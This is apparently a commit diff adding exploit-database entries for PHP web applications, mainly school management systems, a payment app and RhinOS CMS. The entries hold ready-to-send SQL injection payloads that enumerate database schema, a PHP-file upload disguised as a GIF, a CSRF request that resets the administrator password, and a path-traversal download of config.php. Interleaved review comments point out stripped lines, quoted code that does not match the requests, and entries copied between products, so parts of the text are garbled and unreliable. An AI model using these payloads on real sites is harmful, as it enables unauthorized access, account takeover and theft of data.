+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] +# +#[PATH]/user/view.php +#01 single_user($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:16:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45723.txt b/exploits/php/webapps/45723.txt new file mode 100644 index 000000000..3c37555eb --- /dev/null +++ b/exploits/php/webapps/45723.txt 
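Review bot: Each `view.php` excerpt jumps from `#01 select_student($_GET['id']);` (or `single_event`/`single_user`) straight to `#04`, so lines 02–03 — presumably the opening PHP tag and the object the method is called on — are missing; it looks as if anything inside angle brackets was stripped on import, and the excerpts should be restored so the vulnerable statement reads as real code. 45727 in a later hunk of this commit reuses these three requests verbatim, including the response timestamps `17:12:15` and `17:16:52` for PoC 2 and 3, which suggests they were not re-run against the School Attendance Monitoring System; if the two products share the `student/`, `event/` and `user/` modules, a sentence saying so would explain the identical captures.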
@@ -0,0 +1,89 @@ +# Exploit Title: School Event Management System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18793 + +# POC: +# 1) +# http://localhost/[PATH]/event/controller.php?action=photos +# +GIFefe + +# http://localhost/[PATH]/event/photo/[FILE] +# +#[PATH]/event/controller.php +#.... +#29 function doInsert(){ +#30 if(isset($_POST['save'])){ +#31 +#32 +#33 $errofile = $_FILES['image']['error']; +#34 $type = $_FILES['image']['type']; +#35 $temp = $_FILES['image']['tmp_name']; +#36 $myfile =$_FILES['image']['name']; +#37 $location="photo/".$myfile; +#38 +#39 @$file=$_FILES['image']['tmp_name']; +#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name'])); +#41 @$image_name= addslashes($_FILES['image']['name']); +#42 @$image_size= getimagesize($_FILES['image']['tmp_name']); +#.... 
+GET /[PATH]/event/controller.php?action=photos HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3634372676911755021110261466 +Content-Length: 617 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="EventID" +1 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +1000000 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php" +Content-Type: application/force-download +GIFefe + +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="savephoto" +-----------------------------3634372676911755021110261466-- +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:27:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 143 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45724.txt b/exploits/php/webapps/45724.txt new file mode 100644 index 000000000..7a19b8ff6 --- /dev/null +++ b/exploits/php/webapps/45724.txt @@ -0,0 +1,84 @@ +# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18794 + +# POC: +# 1) +# .../[PATH]user/user/edit.php +#02 if (!isset($_SESSION['ACCOUNT_ID'])){ +#03 redirect(web_root."index.php"); +#04 } +#05 +#06 @$USERID = $_GET['id']; +#07 if($USERID==''){ +#08 redirect("index.php"); +#09 } +#10 $user = New User(); +#11 $singleuser = $user->single_user($USERID); +# .../[PATH]user/controller.php +#80 $user = New User(); +#81 $user->ACCOUNT_NAME = $_POST['U_NAME']; +#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME']; +#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']); +#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE']; +#85 $user->update($_POST['USERID']); +#86 +#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success"); +#88 redirect("index.php"); +# ... + + +
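Review bot: The quoted `doInsert()` reads `$_FILES['image']` and `$_POST['save']`, but the PoC request uploads a part named `photo` and submits `savephoto`, so the excerpt is from a different handler than the `action=photos` endpoint being exercised; the lines that take the upload's original filename and write it under `event/photo/` without checking the extension are the ones a maintainer needs, and those should be quoted instead. The request is also shown as `GET` with a multipart body and `Content-Length: 617`, which needs a second look. 45726 in a later hunk is a byte-for-byte copy of this file, down to the response `Date` of 17:27:54, so either the two products share this module or the second entry was not re-tested; either way the entry should say so. The blank lines under `# 2)` are presumably an HTML upload form lost on import.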
+ + + + + + + + + + + + + + + + +POST /[PATH]/user/controller.php?action=edit HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 136 +USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save= +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:57:48 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 128 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`useraccounts` */ +$useraccounts = array( + array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png') +); \ No newline at end of file diff --git a/exploits/php/webapps/45725.txt b/exploits/php/webapps/45725.txt new file mode 100644 index 000000000..a7ea4c063 --- /dev/null +++ b/exploits/php/webapps/45725.txt 
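Review bot: The session check quoted from `edit.php` line 02 belongs to the form page, while the `controller.php` lines 80–88 that actually apply the update show no session, token or Origin check, so the entry should state whether `controller.php?action=edit` is reachable without a logged-in session — that would make this an unauthenticated admin takeover rather than CSRF, and the CVE description would differ. `Host: 192.168.1.27` exposes the tester's lab address where every other entry in this commit uses the `TARGET` placeholder. The run of blank lines after `# ...` is presumably the CSRF HTML page lost on import and should be restored, since without it the file is just an authenticated POST. 45725 in the following hunk is identical to this file including the response timestamp 17:57:48, so either the School Attendance Monitoring System shares the `user/` module or it was not separately verified; a sentence either way would help.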
@@ -0,0 +1,84 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18797 + +# POC: +# 1) +# .../[PATH]/user/user/edit.php +#02 if (!isset($_SESSION['ACCOUNT_ID'])){ +#03 redirect(web_root."index.php"); +#04 } +#05 +#06 @$USERID = $_GET['id']; +#07 if($USERID==''){ +#08 redirect("index.php"); +#09 } +#10 $user = New User(); +#11 $singleuser = $user->single_user($USERID); +# .../[PATH]/user/controller.php +#80 $user = New User(); +#81 $user->ACCOUNT_NAME = $_POST['U_NAME']; +#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME']; +#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']); +#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE']; +#85 $user->update($_POST['USERID']); +#86 +#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success"); +#88 redirect("index.php"); +# ... 
+ + + + + + + + + + + + + + + + + + + +POST /[PATH]/user/controller.php?action=edit HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 136 +USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save= +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:57:48 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 128 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`useraccounts` */ +$useraccounts = array( + array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png') +); \ No newline at end of file diff --git a/exploits/php/webapps/45726.txt b/exploits/php/webapps/45726.txt new file mode 100644 index 000000000..5cdaae781 --- /dev/null +++ b/exploits/php/webapps/45726.txt 
@@ -0,0 +1,89 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18799 + +# POC: +# 1) +# http://localhost/[PATH]/event/controller.php?action=photos +# +GIFefe + +# http://localhost/[PATH]/event/photo/[FILE] +# +#[PATH]/event/controller.php +#.... +#29 function doInsert(){ +#30 if(isset($_POST['save'])){ +#31 +#32 +#33 $errofile = $_FILES['image']['error']; +#34 $type = $_FILES['image']['type']; +#35 $temp = $_FILES['image']['tmp_name']; +#36 $myfile =$_FILES['image']['name']; +#37 $location="photo/".$myfile; +#38 +#39 @$file=$_FILES['image']['tmp_name']; +#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name'])); +#41 @$image_name= addslashes($_FILES['image']['name']); +#42 @$image_size= getimagesize($_FILES['image']['tmp_name']); +#.... 
+GET /[PATH]/event/controller.php?action=photos HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------3634372676911755021110261466 +Content-Length: 617 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="EventID" +1 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="MAX_FILE_SIZE" +1000000 +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php" +Content-Type: application/force-download +GIFefe + +-----------------------------3634372676911755021110261466 +Content-Disposition: form-data; name="savephoto" +-----------------------------3634372676911755021110261466-- +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:27:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 143 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45727.txt b/exploits/php/webapps/45727.txt new file mode 100644 index 000000000..61b55cc8d --- /dev/null +++ b/exploits/php/webapps/45727.txt 
@@ -0,0 +1,108 @@ +# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18798 + +# POC: +# 1) +# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] +# +#[PATH]/student/view.php +#01 select_student($_GET['id']); +#04 +#05 +#06 $course = New Course(); +#07 $resCourse = $course->single_course($res->CourseID); +#08 +#09 ?> +GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:37:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# 
http://localhost/[PATH]/event/index.php?view=view&id=[SQL] +# +#[PATH]/event/view.php +#01 single_event($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:12:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] +# +#[PATH]/user/view.php +#01 single_user($_GET['id']); +#04 +#05 +#06 +#07 ?> +GET 
/[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 17:16:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45728.txt b/exploits/php/webapps/45728.txt new file mode 100644 index 000000000..59de07780 --- /dev/null +++ b/exploits/php/webapps/45728.txt 
@@ -0,0 +1,104 @@ +# Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18800 + +# POC: +# 1) +# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] +# +#[PATH]/accomodation.php +#... +#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; +#51 +#52 +#53 }elseif(isset($_GET['q'])){ +#54 +#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; +#56 +#57 +#58 +#59 } +#60 +#61 $accomodation = ' | ' . $_GET['q']; +#62 ?> +#... +GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:55:17 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT 
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?p=rooms&q=[SQL] +# +#[PATH]/room_rates.php +#... +#50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; +#51 +#52 +#53 }elseif(isset($_GET['q'])){ +#54 +#55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; +#56 +#57 +#58 }else{ +#59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; +#60 } +#61 +#62 $accomodation = ' | ' . @$_GET['q']; +#63 ?> +#... +GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 28 Oct 2018 19:58:47 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive 
+Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/admin/login.php +# +#[PATH]/admin/login.php +#... +#58 if (isset($_POST['btnlogin'])) { +#59 //form has been submitted1 +#60 +#61 $uname = trim($_POST['email']); +#62 $upass = trim($_POST['pass']); +#... \ No newline at end of file diff --git a/exploits/php/webapps/45729.txt b/exploits/php/webapps/45729.txt new file mode 100644 index 000000000..2a224ca56 --- /dev/null +++ b/exploits/php/webapps/45729.txt 
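Review bot: Line `#50` of the accomodation.php excerpt concatenates `$_POST['person']` into the query unquoted (`AND NUMPERSON = " . $_POST['person']`), which is an integer-context injection on the same page that neither GET request exercises; the PoC should either cover it with a POST or at least name it as an additional sink. POC 3 stops at `#62` right after `$uname = trim($_POST['email']);` and gives no query line and no request, so as written the file does not show that `admin/login.php` is injectable; add the statement that consumes `$uname`/`$upass` together with a sample POST, or drop the section.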
@@ -0,0 +1,62 @@
+# Exploit Title: RhinOS CMS 3.x - Arbitrary File Download
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.saltos.org/
+# Software Link: https://netix.dl.sourceforge.net/project/rhinos/archived/r1190/RhinOS-en-3.0-1190.win32.exe
+# Version: 3.1 r0 / 3.x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18760
+
+# Users...
+# C:/rhinos/demo/admin/php/download.php
+#....
+#26 $head=0;$main=0;$tail=0;
+#27 include("inicio.php");
+#28 if(!check_user()) die();
+#29 $name=getParam("name");
+#30 $file="files/".getParam("file");
+#31 $size=getParam("size");
+#32 $type=getParam("type");
+#33 if(!file_exists($file)) die();
+#34 header("Pragma: public");
+#35 header("Expires: 0");
+#36 header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+#37 header("Content-Type: $type");
+#38 header("Content-Length: $size");
+#39 header("Content-Disposition: attachment; filename=\"$name\"");
+#40 header("Content-Transfer-Encoding: binary");
+#41 $fp=fopen($file,"rb");
+#42 while(!feof($fp)) echo fread($fp,8192);
+#43 fclose($fp);
+#44 disconnect();
+#....
+
+# POC:
+# 1)
+# http://localhost/[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php
+#
+GET /[PATH]/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
